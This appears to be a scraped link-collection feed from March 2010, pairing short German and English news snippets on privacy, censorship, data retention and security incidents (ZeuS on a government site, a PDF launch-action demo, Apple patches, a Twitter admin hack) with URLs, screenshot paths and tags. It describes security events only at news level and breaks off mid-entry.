+</p>http://www.mactechnews.de/news/index/Facebook-Fehler-fuhrte-zur-Veroffentlichung-aller-E-Mail-Adressen-146413.htmlpage_shots/2010/03/31/facebook-fehler-fuhrte-zur-veroffentlichung-aller.pngfacebook-fehler-fuhrte-zur-veroffentlichung-aller61012010-03-31 21:19:222datenschutz facebookheise online - Webseite des Umweltbundesamtes verteilte TrojanerDie Startseite des Umweltbundesamtes www.umweltbundesamt.de (UBA) war mit dem Trojaner ZeuS infiziert. Möglicherweise wurden PCs von Besuchern ebenfalls mit ZeuS infiziert. ZeuS ist ein äußerst effektiver Trojaner, der es insbesondere auf Online-Banking-Daten abgesehen hat. Er ist in der Lage, seinem Opfer eine echte Bankseite vorzugaukeln, indem er eigenen HTML-Code in den Browser schleust. Eingegebene PINs, TANs und anderen Daten verschickt er in Echtzeit unter anderem mit einem integrierten Instant-Messaging-Client. Er tarnt sich im System mittels Rootkit-Techniken. + +Anzeige +Einzelne Fachbereich des Umweltbundesamtes wie die Deutsche Emissionshandelsstelle (DEHSt) haben ihre Kunden bereits per Mail informiert. "Falls Sie die Internetseite des UBA zwischen Freitag, dem 19. März, und Montag, dem 22. März 2010, besucht haben, könnte sich der Trojaner auf Ihren Computer herunter geladen haben", <p>Die Startseite des Umweltbundesamtes www.umweltbundesamt.de (UBA) war mit dem Trojaner ZeuS infiziert. Möglicherweise wurden PCs von Besuchern ebenfalls mit ZeuS infiziert. ZeuS ist ein äußerst effektiver Trojaner, der es insbesondere auf Online-Banking-Daten abgesehen hat. Er ist in der Lage, seinem Opfer eine echte Bankseite vorzugaukeln, indem er eigenen HTML-Code in den Browser schleust. Eingegebene PINs, TANs und anderen Daten verschickt er in Echtzeit unter anderem mit einem integrierten Instant-Messaging-Client. Er tarnt sich im System mittels Rootkit-Techniken. +</p> +<p>Anzeige + Einzelne Fachbereich des Umweltbundesamtes wie die Deutsche Emissionshandelsstelle (DEHSt) haben ihre Kunden bereits per Mail informiert. "Falls Sie die Internetseite des UBA zwischen Freitag, dem 19. März, und Montag, dem 22. März 2010, besucht haben, könnte sich der Trojaner auf Ihren Computer herunter geladen haben", +</p>http://www.heise.de/newsticker/meldung/Webseite-des-Umweltbundesamtes-verteilte-Trojaner-967570.htmlpage_shots/2010/03/31/heise-online-webseite-des-umweltbundesamtes-vert.pngheise-online-webseite-des-umweltbundesamtes-vert11012010-03-31 18:22:302malware trojan umweltbundesamtSEX.com filed bankruptcyDie Zeiten sind schlecht! + +With creditors swirling around the owner of an infamous website name, a California Federal Bankruptcy court must get its papers soiled as it attempts to determine whether or not a New Jersey lender can dismiss a bankruptcy action in order to pursue claimed assets.<p>Die Zeiten sind schlecht! +</p> +<p>With creditors swirling around the owner of an infamous website name, a California Federal Bankruptcy court must get its papers soiled as it attempts to determine whether or not a New Jersey lender can dismiss a bankruptcy action in order to pursue claimed assets. +</p>http://www.allvoices.com/contributed-news/5509808-sex-maybe-going-bankruptpage_shots/2010/03/31/sexcom-filed-bankruptcy.pngsexcom-filed-bankruptcy11012010-03-31 16:05:402bankruptcy sexheise online - China: Yahoo-Mailkonten ausländischer Journalisten angegriffenIn den vergangenen Wochen wurden bis zu acht ausländische Journalisten, die in der Volkrsrepublik China oder in Taiwan arbeiten und ihre E-Mail-Konten bei Yahoo haben, Ziel von Crackerangriffen. Wie der Verband Foreign Correspondent's Club of China (FCCC) berichtet, waren verschiedene Accounts angegriffen worden. In einem Fall seien alle Mails des Accounts durch das Hinzufügen einer Standard-Forwarding-Adresse an einen unbekannten Empfänger weitergeleitet worden.<p>In den vergangenen Wochen wurden bis zu acht ausländische Journalisten, die in der Volkrsrepublik China oder in Taiwan arbeiten und ihre E-Mail-Konten bei Yahoo haben, Ziel von Crackerangriffen. Wie der Verband Foreign Correspondent's Club of China (FCCC) berichtet, waren verschiedene Accounts angegriffen worden. In einem Fall seien alle Mails des Accounts durch das Hinzufügen einer Standard-Forwarding-Adresse an einen unbekannten Empfänger weitergeleitet worden. +</p>http://www.heise.de/newsticker/meldung/China-Yahoo-Mailkonten-auslaendischer-Journalisten-angegriffen-968385.htmlpage_shots/2010/03/31/heise-online-china-yahoo-mailkonten-auslandisch.pngheise-online-china-yahoo-mailkonten-auslandisch11012010-03-31 15:58:122china yahooheise online - PDF-Exploit funktioniert ohne konkrete Sicherheitslücke Der PDF-Sicherheitsspezialist Didier Stevens hat ein PDF-Dokument entwickelt, das – ohne eine konkrete Schwachstelle auszunutzen – einen PC infizieren könnte. Der Demo-Exploit funktioniert sowohl im Adobe Reader als auch in Foxit. Stevens macht sich dabei nach eigenen Angaben die Option "Launch Actions/Launch File" zunutze, die sogar im PDF eingebettete Skripte oder EXE-Dateien starten kann – diese Option ist Bestandteil der PDF-Spezifikation.<p>Der PDF-Sicherheitsspezialist Didier Stevens hat ein PDF-Dokument entwickelt, das – ohne eine konkrete Schwachstelle auszunutzen – einen PC infizieren könnte. Der Demo-Exploit funktioniert sowohl im Adobe Reader als auch in Foxit. Stevens macht sich dabei nach eigenen Angaben die Option "Launch Actions/Launch File" zunutze, die sogar im PDF eingebettete Skripte oder EXE-Dateien starten kann – diese Option ist Bestandteil der PDF-Spezifikation. +</p>http://www.heise.de/newsticker/meldung/PDF-Exploit-funktioniert-ohne-konkrete-Sicherheitsluecke-968031.htmlpage_shots/2010/03/31/heise-online-pdf-exploit-funktioniert-ohne-konkr.pngheise-online-pdf-exploit-funktioniert-ohne-konkr11012010-03-31 15:54:062adobe pdf Poland Abandons Internet Censorship Plans - New Europe - WSJPolish Internet users have scored a major victory in their fight against a law that would have blocked certain Web sites deemed to have dangerous content. Under the weight of their online protests, Prime Minister Donald Tusk decided to abandon the proposed law, which was originally designed to block gambling sites. + +The government decided to scrap the register of banned Web sites after talks between Tusk and nongovernmental organizations, according to a statement on the prime minister’s Web site Thursday.<p>Polish Internet users have scored a major victory in their fight against a law that would have blocked certain Web sites deemed to have dangerous content. Under the weight of their online protests, Prime Minister Donald Tusk decided to abandon the proposed law, which was originally designed to block gambling sites. +</p> +<p>The government decided to scrap the register of banned Web sites after talks between Tusk and nongovernmental organizations, according to a statement on the prime minister’s Web site Thursday. +</p>http://blogs.wsj.com/new-europe/2010/02/18/poland-abandons-internet-censorship-plans/page_shots/2010/03/31/poland-abandons-internet-censorship-plans-new.pngpoland-abandons-internet-censorship-plans-new11012010-03-31 14:24:252censorshipMitmach-Aktion: Bei der Schufa&Co (kostenlos) Auskunft verlangen!Infolge der letzten Datenschutzreform ist es nun möglich kostenlos! bei Schufa&Co Auskunft über seine gespeicherten Daten zu erhalten. Vordrucke sind vorhanden und jeder sollte mitmachen und denen das Leben schwer machen!<p>Infolge der letzten Datenschutzreform ist es nun möglich kostenlos! bei Schufa&amp;Co Auskunft über seine gespeicherten Daten zu erhalten. Vordrucke sind vorhanden und jeder sollte mitmachen und denen das Leben schwer machen! +</p>http://www.netzpolitik.org/2010/mitmach-aktion-bei-schufa-co-auskunft-verlangen/page_shots/2010/03/31/mitmach-aktion-bei-der-schufaco-kostenlos-ausk.pngmitmach-aktion-bei-der-schufaco-kostenlos-ausk61012010-03-31 14:04:382datenschutz schufaIsrael: Anonymität im Internet wird zum GrundrechtDer Oberste Gerichtshof Israels hat die Anonymität von Internet-Nutzern zu einem Grundrecht von Verfassungsrang erhoben. Strafverfolgungsbehörden dürfen somit nicht mehr in allen Fällen auf identifizierende Informationen zugreifen. <p>Der Oberste Gerichtshof Israels hat die Anonymität von Internet-Nutzern zu einem Grundrecht von Verfassungsrang erhoben. Strafverfolgungsbehörden dürfen somit nicht mehr in allen Fällen auf identifizierende Informationen zugreifen. +</p>http://winfuture.de/news,54485.htmlpage_shots/2010/03/31/israel-anonymitat-im-internet-wird-zum-grundrecht.pngisrael-anonymitat-im-internet-wird-zum-grundrecht131012010-03-31 13:47:372anonymity, anonymität, constitution, data retention, free speech, internet, law, redefreiheit, vds, vorratsdatenspeicherunggulli.com - news - Berlin: Staatsanwalt will VDS-Daten missbrauchenObwohl es verfassungswidrig ist, möchte der Berliner Staatsanwalt die Daten der Vorratsdatenspeicherung zur Strafverfolgung benutzen. Er beruft sich dabei auf eine Lücke im Karlsruher Urteil. Justizsenatorin von der Aue hat damit offensichtlich kein Problem. +Seit dem 1.1. 2008 wurde von allen bundesdeutschen Bürgern beispielsweise registriert, wann sie welche Nummern anriefen und wie lange die Gespräche anhielten. Für Ermittler sind dies durchaus interessante Daten. Und obwohl das Bundesverfassungsgericht diese Speicherung für illegal erklärte, will die Berliner Justiz weiterhin auf bestehendes Material zugreifen. Der Berliner Generalstaatsanwalt Ralf Rother hat für die dortigen Ermittler eine Art Bedienungsanleitung herausgegeben. Ob die Daten benutzt werden, sei "unter Abwägung der betroffenen Rechtsgüter zu entscheiden". Zu berücksichtigen sei dabei auch die "Gewichtung des staatlichen Interesses an der Tataufklärung". Unklarer geht es kaum noch. + +Herr Rother beruft sich dabei auf eine Lücke im Karlsruher Urteil. Dort steht nichts von dem Verbleib der Daten, die bereits vor dem Urteil an die Behörden übermittelt wurden. Er glaubt, er und seine Mitarbeiter könnten damit arbeiten, obwohl das Bundesverfassungsgericht entschieden hat, dass die Speicherung der Verbindungsdaten einen Verstoß gegen das Fernmeldegeheimnis darstellt. + +Von Berlins Justizsenatorin Gisela von der Aue (SPD) kommt auch auf Nachfrage der taz kein Widerspruch. Man sieht sich für derartige Fragestellungen nicht zuständig. Die Freigabe der Daten müsse im Einzelfall von einem Richter geprüft werden.<p>Obwohl es verfassungswidrig ist, möchte der Berliner Staatsanwalt die Daten der Vorratsdatenspeicherung zur Strafverfolgung benutzen. Er beruft sich dabei auf eine Lücke im Karlsruher Urteil. Justizsenatorin von der Aue hat damit offensichtlich kein Problem. + Seit dem 1.1. 2008 wurde von allen bundesdeutschen Bürgern beispielsweise registriert, wann sie welche Nummern anriefen und wie lange die Gespräche anhielten. Für Ermittler sind dies durchaus interessante Daten. Und obwohl das Bundesverfassungsgericht diese Speicherung für illegal erklärte, will die Berliner Justiz weiterhin auf bestehendes Material zugreifen. Der Berliner Generalstaatsanwalt Ralf Rother hat für die dortigen Ermittler eine Art Bedienungsanleitung herausgegeben. Ob die Daten benutzt werden, sei "unter Abwägung der betroffenen Rechtsgüter zu entscheiden". Zu berücksichtigen sei dabei auch die "Gewichtung des staatlichen Interesses an der Tataufklärung". Unklarer geht es kaum noch. +</p> +<p>Herr Rother beruft sich dabei auf eine Lücke im Karlsruher Urteil. Dort steht nichts von dem Verbleib der Daten, die bereits vor dem Urteil an die Behörden übermittelt wurden. Er glaubt, er und seine Mitarbeiter könnten damit arbeiten, obwohl das Bundesverfassungsgericht entschieden hat, dass die Speicherung der Verbindungsdaten einen Verstoß gegen das Fernmeldegeheimnis darstellt. +</p> +<p>Von Berlins Justizsenatorin Gisela von der Aue (SPD) kommt auch auf Nachfrage der taz kein Widerspruch. Man sieht sich für derartige Fragestellungen nicht zuständig. Die Freigabe der Daten müsse im Einzelfall von einem Richter geprüft werden. +</p>http://www.gulli.com/news/berlin-staatsanwalt-will-vds-daten-missbrauchen-2010-03-30page_shots/2010/03/31/gullicom-news-berlin-staatsanwalt-will-vds-d.pnggullicom-news-berlin-staatsanwalt-will-vds-d11012010-03-31 09:54:552berlin vorratsdatenspeicherunggulli.com - news - TrueCrypt geknackt - oder auch nicht"Unsere Kunden aus dem Gebiet der Strafverfolgung haben nach einer Möglichkeit zur Entschlüsselung von Truecrypt-Laufwerken verlangt - und wir haben eine praktische und effiziente Methode entwickelt, um schnell an verschlüsselte Daten heranzukommen", wirbt Passware-Chef Dmitry Sumin. Mit Hilfe der Software sollen Ermittler ohne großen Zeitverlust auch auf verschlüsselten Datenträgern nach Beweisen suchen können. Allerdings funktioniert das nur unter ganz bestimmten Bedingungen. Für eine erfolgreiche Entschlüsselung muss der beschlagnahmte Windows-Rechner eingeschaltet sein und eine Firewire-Schnittstelle besitzen - über Firewire ist es möglich, Speicherabbilder zu erstellen, auch wenn der Rechner gesperrt ist. Nur aus diesem Speicherabbild kann das Passwort für das verschlüsselte Laufwerk gewonnen werden. + +800,-€ pro Jahr<p>"Unsere Kunden aus dem Gebiet der Strafverfolgung haben nach einer Möglichkeit zur Entschlüsselung von Truecrypt-Laufwerken verlangt - und wir haben eine praktische und effiziente Methode entwickelt, um schnell an verschlüsselte Daten heranzukommen", wirbt Passware-Chef Dmitry Sumin. Mit Hilfe der Software sollen Ermittler ohne großen Zeitverlust auch auf verschlüsselten Datenträgern nach Beweisen suchen können. Allerdings funktioniert das nur unter ganz bestimmten Bedingungen. Für eine erfolgreiche Entschlüsselung muss der beschlagnahmte Windows-Rechner eingeschaltet sein und eine Firewire-Schnittstelle besitzen - über Firewire ist es möglich, Speicherabbilder zu erstellen, auch wenn der Rechner gesperrt ist. Nur aus diesem Speicherabbild kann das Passwort für das verschlüsselte Laufwerk gewonnen werden. +</p> +<p>800,-€ pro Jahr +</p>http://www.gulli.com/news/truecrypt-geknackt-oder-auch-nicht-2010-03-30page_shots/2010/03/31/gullicom-news-truecrypt-geknackt-oder-auch.pnggullicom-news-truecrypt-geknackt-oder-auch11012010-03-31 09:53:382encryptionApple fixt mal eben 88 SicherheitslückenDirekt von Fefe kopiert... + + Apple fixt mal eben 88 Sicherheitslücken. Mir ist überhaupt nur eine Firma bekannt, die so viele Bugs auf einmal gefixt hat: Oracle. Das ist selbst für Apple-Verhältnisse eine ausgesprochen sportliche Leistung. Und da sind so Brüller drin wie: +* Code Execution in Rechtschreibprüfung +* Nach dem Reboot ist manchmal die Firewall aus +* Wenn man bei AFP den Gastzugang abschaltet, ist er noch an, und man kann auf Dateien außerhalb der Share zugreifen +* Code Execution durch Audio oder Video abspielen +* Code Execution durch Plattenimage Mounten +* Rootzugriff über Directory Service oder eine der Lücken in OS Services +* Auch per FTP kann man Dateien außerhalb des FTP-Verzeichnisbaumes abrufen +* beim Chatten kann man den Server ownen +* Bilder aufmachen haben sie anscheinend einmal bei jedem verfügbaren Bildformat verkackt, sogar bei RAW-Bildern. +* Das Konvertieren von Fließkommazahlen führt zu Code Execution +* Man kann sich remote über ein altes Passwort einloggen, und Login-Restriktionen wirken auch nicht +* Postscript-Dateien öffnen führt zu Code Execution +* Quicktime ist eh eine einzige Trojaner-Deployment-Plattform +... <p>Direkt von Fefe kopiert... +</p> +<p> Apple fixt mal eben 88 Sicherheitslücken. Mir ist überhaupt nur eine Firma bekannt, die so viele Bugs auf einmal gefixt hat: Oracle. Das ist selbst für Apple-Verhältnisse eine ausgesprochen sportliche Leistung. Und da sind so Brüller drin wie: + * Code Execution in Rechtschreibprüfung + <em> Nach dem Reboot ist manchmal die Firewall aus +</em> Wenn man bei AFP den Gastzugang abschaltet, ist er noch an, und man kann auf Dateien außerhalb der Share zugreifen + <em> Code Execution durch Audio oder Video abspielen +</em> Code Execution durch Plattenimage Mounten + <em> Rootzugriff über Directory Service oder eine der Lücken in OS Services +</em> Auch per FTP kann man Dateien außerhalb des FTP-Verzeichnisbaumes abrufen + <em> beim Chatten kann man den Server ownen +</em> Bilder aufmachen haben sie anscheinend einmal bei jedem verfügbaren Bildformat verkackt, sogar bei RAW-Bildern. + <em> Das Konvertieren von Fließkommazahlen führt zu Code Execution +</em> Man kann sich remote über ein altes Passwort einloggen, und Login-Restriktionen wirken auch nicht + <em> Postscript-Dateien öffnen führt zu Code Execution +</em> Quicktime ist eh eine einzige Trojaner-Deployment-Plattform + ... +</p>http://blog.fefe.de/?ts=b54caa44page_shots/2010/03/31/apple-fixt-mal-eben-88-sicherheitslucken_.pngapple-fixt-mal-eben-88-sicherheitslucken11012010-03-31 09:34:012apple53 cars towed awayfake sign pointed to a parking lot where the 53 cars got towed away while their owners were enjoying a Glenn Beck show. Summed up to $ 6,500.- for all cars. +<p>fake sign pointed to a parking lot where the 53 cars got towed away while their owners were enjoying a Glenn Beck show. Summed up to $ 6,500.- for all cars. +</p>http://www.allbestnews.net/53-cars-towed-from-ucf-while-glenn-beck-event.htmlpage_shots/2010/03/31/53-cars-towed-away.png53-cars-towed-away11012010-03-31 09:31:202cars foxSCO loses again: jury says Novell owns UNIX SVRX copyrightsThe SCO Group was dealt a serious, potentially fatal blow today in its courtroom battle against Linux. The jury in the trial between SCO and Novell has issued a verdict affirming that Novell is the rightful owner of the UNIX SVRX copyrights. This verdict will make it difficult for SCO to continue pursuing its baseless assault on the open source operating system. + +SCO cannot continue pursuing its infringement litigation against IBM or assorted Linux users because it doesn't own the copyrights that it claims are infringed by Linux. Even if the jury had ruled in SCO's favor, the overwhelming lack of evidence of infringement would still likely make it impossible for SCO to achieve victory in its litigation campaign. It's unclear if the company will be able to evade liquidation following this latest failure in court.<p>The SCO Group was dealt a serious, potentially fatal blow today in its courtroom battle against Linux. The jury in the trial between SCO and Novell has issued a verdict affirming that Novell is the rightful owner of the UNIX SVRX copyrights. This verdict will make it difficult for SCO to continue pursuing its baseless assault on the open source operating system. +</p> +<p>SCO cannot continue pursuing its infringement litigation against IBM or assorted Linux users because it doesn't own the copyrights that it claims are infringed by Linux. Even if the jury had ruled in SCO's favor, the overwhelming lack of evidence of infringement would still likely make it impossible for SCO to achieve victory in its litigation campaign. It's unclear if the company will be able to evade liquidation following this latest failure in court. +</p>http://arstechnica.com/open-source/news/2010/03/sco-loses-again-jury-says-novell-owns-unix-svrx-copyrights.arspage_shots/2010/03/30/sco-loses-again-jury-says-novell-owns-unix-svrx-c.pngsco-loses-again-jury-says-novell-owns-unix-svrx-c11012010-03-30 23:32:432novell scoChinese City is World's Hacking Capital*Maybe propaganda?* +*** +Researchers based in Symantec studied over 12 billion emails and +identified that almost 30% of all malicious emails are sourced from +within China and that 21.3% came from the Chinese city of Shaoxing +alone. The researchers were also able to identify that the primary +targets for these malicious emails were human rights activists and +experts in Asian defence policy, which they claim indicates a strong +state involvement in the attacks. The research shows that 28.2% of the +targeted attacks came from China, with 21.1% coming from Romania and the +United States coming in as the third highest source of malicious emails. +<p><em>Maybe propaganda?</em> + <hr /> + Researchers based in Symantec studied over 12 billion emails and + identified that almost 30% of all malicious emails are sourced from + within China and that 21.3% came from the Chinese city of Shaoxing + alone. The researchers were also able to identify that the primary + targets for these malicious emails were human rights activists and + experts in Asian defence policy, which they claim indicates a strong + state involvement in the attacks. The research shows that 28.2% of the + targeted attacks came from China, with 21.1% coming from Romania and the + United States coming in as the third highest source of malicious emails. +</p>http://technology.timesonline.co.uk/tol/news/tech_and_web/the_web/article7078760.ecepage_shots/2010/03/30/chinese-city-is-worlds-hacking-capital.pngchinese-city-is-worlds-hacking-capital11012010-03-30 22:36:102china e-mail malwareFrenchman Arrested for Hacking TwitterFrench police have arrested a 25 year old unemployed man on suspicion +of hacking into a number of administrator accounts belonging to the +micro-blogging site, Twitter. French police believe the suspect, who +uses the online name of Hacker Croll, gained access to the accounts by +simply guessing the answers to the password reset questions. Once he +had access to the administrator accounts, the suspect also accessed the +Twitter accounts of well known people such as President Obama and +singers Britney Spears and Lily Allen. Should he be convicted, the +suspect could face up to 2 years in prison and a fine of EUR30,000 (US +$40,395) +<p>French police have arrested a 25 year old unemployed man on suspicion + of hacking into a number of administrator accounts belonging to the + micro-blogging site, Twitter. French police believe the suspect, who + uses the online name of Hacker Croll, gained access to the accounts by + simply guessing the answers to the password reset questions. Once he + had access to the administrator accounts, the suspect also accessed the + Twitter accounts of well known people such as President Obama and + singers Britney Spears and Lily Allen. Should he be convicted, the + suspect could face up to 2 years in prison and a fine of EUR30,000 (US + $40,395) +</p>http://www.theregister.co.uk/2010/03/25/obama_twitter_hack_suspect_cuffed/page_shots/2010/03/30/frenchman-arrested-for-hacking-twitter.pngfrenchman-arrested-for-hacking-twitter11012010-03-30 22:31:082password twitterDNS Error Extends Great Firewall of ChinaProblems with a root DNS Server in China caused computers in the United +States and Chile to come under the control of the Great Firewall of +China, resulting in requests to sites such as Facebook, Twitter and +YouTube to be redirect to Chinese servers. Once the server, operated +by the Swedish service provider Netnod, was disconnected from the +Internet, the problem was resolved. The problem was first noticed by +NIC Chile, that noticed that several ISPs were providing faulty DNS +information. China uses DNS to enforce its Great Firewall and somehow +the affected ISPs were using this DNS information. Netnod claims that +their server did not contain the faulty data that redirected traffic and +security experts believe that it must have been altered by the Chinese +government.<p>Problems with a root DNS Server in China caused computers in the United + States and Chile to come under the control of the Great Firewall of + China, resulting in requests to sites such as Facebook, Twitter and + YouTube to be redirect to Chinese servers. Once the server, operated + by the Swedish service provider Netnod, was disconnected from the + Internet, the problem was resolved. The problem was first noticed by + NIC Chile, that noticed that several ISPs were providing faulty DNS + information. China uses DNS to enforce its Great Firewall and somehow + the affected ISPs were using this DNS information. Netnod claims that + their server did not contain the faulty data that redirected traffic and + security experts believe that it must have been altered by the Chinese + government. +</p>http://www.computerworld.com/s/article/9174278/After_DNS_problem_Chinese_root_server_is_shut_downpage_shots/2010/03/30/dns-error-extends-great-firewall-of-china.pngdns-error-extends-great-firewall-of-china11012010-03-30 22:27:132china greatfirewallSecurity Flaws Found in Smart MetersA security researcher, Joshua Wright of InGuardians, has identified a +number of security vulnerabilities with the smart meters a number of US +utilities are rolling out to their customers. The vulnerabilities, +which could be exploited remotely via wireless technology or by +physically tampering with the meter, include the ability to ramp up +peoples' bills and to shut off their power. The research, which was +commissioned by a three power utility companies, discovered +vulnerabilities in all five of the makers of meters submitted for +testing. So far eight million smart power meters have been installed +within the United States with that number reaching 60 million by 2020. +<p>A security researcher, Joshua Wright of InGuardians, has identified a + number of security vulnerabilities with the smart meters a number of US + utilities are rolling out to their customers. The vulnerabilities, + which could be exploited remotely via wireless technology or by + physically tampering with the meter, include the ability to ramp up + peoples' bills and to shut off their power. The research, which was + commissioned by a three power utility companies, discovered + vulnerabilities in all five of the makers of meters submitted for + testing. So far eight million smart power meters have been installed + within the United States with that number reaching 60 million by 2020. +</p>http://www.syracuse.com/news/index.ssf/2010/03/smart_utility_meters_have_secu.htmlpage_shots/2010/03/30/security-flaws-found-in-smart-meters.pngsecurity-flaws-found-in-smart-meters11012010-03-30 22:23:472power smartmeterheise online - Italien: Amtliche Präferenz für Open Source ist rechtmäßigVerfassungsgericht vs. Regierung in Italien +Ein Urteil (in italienisch) des italienischen Verfassungsgerichts hat ein im Piemont erlassenes Gesetz bestätigt, das eine generelle Bevorzugung freier und quelloffener Software bei Beschaffungen der öffentlichen Hand vorschreibt. Gegen diese im März 2009 erlassene Richtlinie hatte die italienische Regierung geklagt, da sie wettbewerbsfeindlich sei, berichtet das Open Source Observatory and Repository (OSOR) der EU.<p>Verfassungsgericht vs. Regierung in Italien + Ein Urteil (in italienisch) des italienischen Verfassungsgerichts hat ein im Piemont erlassenes Gesetz bestätigt, das eine generelle Bevorzugung freier und quelloffener Software bei Beschaffungen der öffentlichen Hand vorschreibt. Gegen diese im März 2009 erlassene Richtlinie hatte die italienische Regierung geklagt, da sie wettbewerbsfeindlich sei, berichtet das Open Source Observatory and Repository (OSOR) der EU. +</p>http://www.heise.de/newsticker/meldung/Italien-Amtliche-Praeferenz-fuer-Open-Source-ist-rechtmaessig-967579.htmlpage_shots/2010/03/30/heise-online-italien-amtliche-praferenz-fur-ope.pngheise-online-italien-amtliche-praferenz-fur-ope11012010-03-30 20:44:292fossSolaris only 90 days trialSolaris 10, the official stable version of Sun's UNIX operating system, is no longer available to users at no cost. Oracle has adjusted the terms of the license, which now requires users to purchase a service contract in order to use the software.<p>Solaris 10, the official stable version of Sun's UNIX operating system, is no longer available to users at no cost. Oracle has adjusted the terms of the license, which now requires users to purchase a service contract in order to use the software. +</p>http://arstechnica.com/open-source/news/2010/03/solaris-10-no-longer-free-as-in-beer-now-a-90-day-trial.arspage_shots/2010/03/30/solaris-only-90-days-trial.pngsolaris-only-90-days-trial11012010-03-30 15:31:292oracle solaris sunUmfang der Zensur von Suchergebnissen auf Google.de - SISTRIX Suchmaschinen- &amp; SEO-BlogVon 1.000.000 Keywords habe ich bei 6.017 Keywords so einen Hinweis gefunden - das sind immerhin 0,6 Prozent der Suchanfragen, bei denen Google.de andere Ergebnisse ausliefert als Google.com (auch, wenn google.com auf Deutsch gestellt ist). Schaut man sich die betreffenden Keywords etwas genauer an, so handelt es sich bei rund 90% um Begriffe aus dem Erotikbereich (youporn, blowjob, geile omas), etwa 5% sind ewiggestrige Nazi-Spinner (hitlerjungen, kriegslieder, rudolf hess) und die restlichen 5% sind Suchbegriffe, bei denen Domains aus den ersten zwei Kategorien durch Zufall ranken.<p>Von 1.000.000 Keywords habe ich bei 6.017 Keywords so einen Hinweis gefunden - das sind immerhin 0,6 Prozent der Suchanfragen, bei denen Google.de andere Ergebnisse ausliefert als Google.com (auch, wenn google.com auf Deutsch gestellt ist). Schaut man sich die betreffenden Keywords etwas genauer an, so handelt es sich bei rund 90% um Begriffe aus dem Erotikbereich (youporn, blowjob, geile omas), etwa 5% sind ewiggestrige Nazi-Spinner (hitlerjungen, kriegslieder, rudolf hess) und die restlichen 5% sind Suchbegriffe, bei denen Domains aus den ersten zwei Kategorien durch Zufall ranken. +</p>http://www.sistrix.de/news/938-umfang-der-zensur-von-suchergebnissen-auf-google.de.htmlpage_shots/2010/03/30/umfang-der-zensur-von-suchergebnissen-auf-googled.pngumfang-der-zensur-von-suchergebnissen-auf-googled11012010-03-30 15:29:262censorship googleDARPA Bounces Smart Radar Off Buildings To Track Individual Urban Vehicles From the Sky | Popular ScienceTracking from Above It's difficult to use radar in urban environments because of all the structures that get in the way. But by bouncing highly sensitive radar off of buildings' facades, DARPA hopes to lock onto individual vehicles from UAVs and track them through urban streets even when buildings block line of sight.<p>Tracking from Above It's difficult to use radar in urban environments because of all the structures that get in the way. But by bouncing highly sensitive radar off of buildings' facades, DARPA hopes to lock onto individual vehicles from UAVs and track them through urban streets even when buildings block line of sight. +</p>http://www.popsci.com/technology/article/2010-03/darpas-street-level-radar-sees-around-corners-track-vehicles-skypage_shots/2010/03/30/darpa-bounces-smart-radar-off-buildings-to-track-i_.pngdarpa-bounces-smart-radar-off-buildings-to-track-i11012010-03-30 11:37:232darpa radar trackingUkrainian hacker liable in SEC insider trading caseThe U.S. Securities and Exchange Commission had accused Oleksandr Dorozhko of gaining access to material nonpublic information about IMS Health Inc's third-quarter 2007 earnings by infiltrating the computer network of Thomson Financial. IMS had planned to announce negative earnings after the market closed that day. + +Minutes after the hack and just before IMS's earnings release, Dorozhko purchased 630 put options on IMS's common stock, the SEC said in a statement.<p>The U.S. Securities and Exchange Commission had accused Oleksandr Dorozhko of gaining access to material nonpublic information about IMS Health Inc's third-quarter 2007 earnings by infiltrating the computer network of Thomson Financial. IMS had planned to announce negative earnings after the market closed that day. +</p> +<p>Minutes after the hack and just before IMS's earnings release, Dorozhko purchased 630 put options on IMS's common stock, the SEC said in a statement. +</p>http://www.reuters.com/article/idUSN2910772020100329page_shots/2010/03/30/ukrainian-hacker-liable-in-sec-insider-trading-cas.pngukrainian-hacker-liable-in-sec-insider-trading-cas11012010-03-30 11:32:382blackhatGoogle, Microsoft to team up on privacy push launching tomorrowThe world’s biggest tech heavyweights are set to team up with each other to influence the future of Internet privacy law. Google, Microsoft and a number of other civil liberties groups, think tanks and tech companies will unveil a set of principles they want to advocate for updating the (http://en.wikipedia.org/wiki/Electronic%20Communications%20Privacy%20Act) Electronic Communications Privacy Act tomorrow. + +That’s a law created in 1986 that sets out the kinds of privacy rights people can expect to have when they use phones and computers. It would also cover government access to data that citizens entrust to companies like Google or Facebook.<p>The world’s biggest tech heavyweights are set to team up with each other to influence the future of Internet privacy law. Google, Microsoft and a number of other civil liberties groups, think tanks and tech companies will unveil a set of principles they want to advocate for updating the (http://en.wikipedia.org/wiki/Electronic%20Communications%20Privacy%20Act) Electronic Communications Privacy Act tomorrow. +</p> +<p>That’s a law created in 1986 that sets out the kinds of privacy rights people can expect to have when they use phones and computers. It would also cover government access to data that citizens entrust to companies like Google or Facebook. +</p>http://digital.venturebeat.com/2010/03/29/google-microsoft-privacy/page_shots/2010/03/30/no_page_shot.pnggoogle-microsoft-to-team-up-on-privacy-push-launc11012010-03-30 11:29:332google microsoft privacyheise online - Sony sperrt Linux von der PS3 ausSony Computer Entertainment hat für den 1. April ein Firmware-Update auf Version 3.21 für die Playstation 3 angekündigt. Doch statt neuer Funktionen hinzuzufügen, soll die Unterstützung des Linux-Betriebssystems der ältereren Konsolenmodelle entfernt werden. Als Grund gibt Charlotte Panther, PR-Chefin von Sony Computer Entertainment Europe, Sicherheitsbedenken an, die offensichtlich von der Überwindung des Hypervisors durch George Hotz Ende Januar herrühren.<p>Sony Computer Entertainment hat für den 1. April ein Firmware-Update auf Version 3.21 für die Playstation 3 angekündigt. Doch statt neuer Funktionen hinzuzufügen, soll die Unterstützung des Linux-Betriebssystems der ältereren Konsolenmodelle entfernt werden. Als Grund gibt Charlotte Panther, PR-Chefin von Sony Computer Entertainment Europe, Sicherheitsbedenken an, die offensichtlich von der Überwindung des Hypervisors durch George Hotz Ende Januar herrühren. +</p>http://www.heise.de/newsticker/meldung/Sony-sperrt-Linux-von-der-PS3-aus-965852.htmlpage_shots/2010/03/30/heise-online-sony-sperrt-linux-von-der-ps3-aus.pngheise-online-sony-sperrt-linux-von-der-ps3-aus11012010-03-30 11:07:112linux ps3 sonySächsische Zeitung [online] - Sachsen: Sachsens Polizeidrohnen droht die Bruchlandung# Bisher ganze 18 Einsätze + +Der Grund: Statt für Erfolgsmeldungen sorgt das Projekt vielmehr für ständigen Ärger und Kritik. So dauerte es zunächst ein Vierteljahr, bis eine für zwölf Monate angemietete Flugdrohne erstmals unter Einsatzbedingungen aufsteigen konnte. Leihgebühren (76000 Euro) und die Anschaffung von Technik zur Auswertung der geplanten Luftaufnahmen (22000 Euro) hielten die Kosten dennoch extrem hoch. Später haderte man wiederum mit der 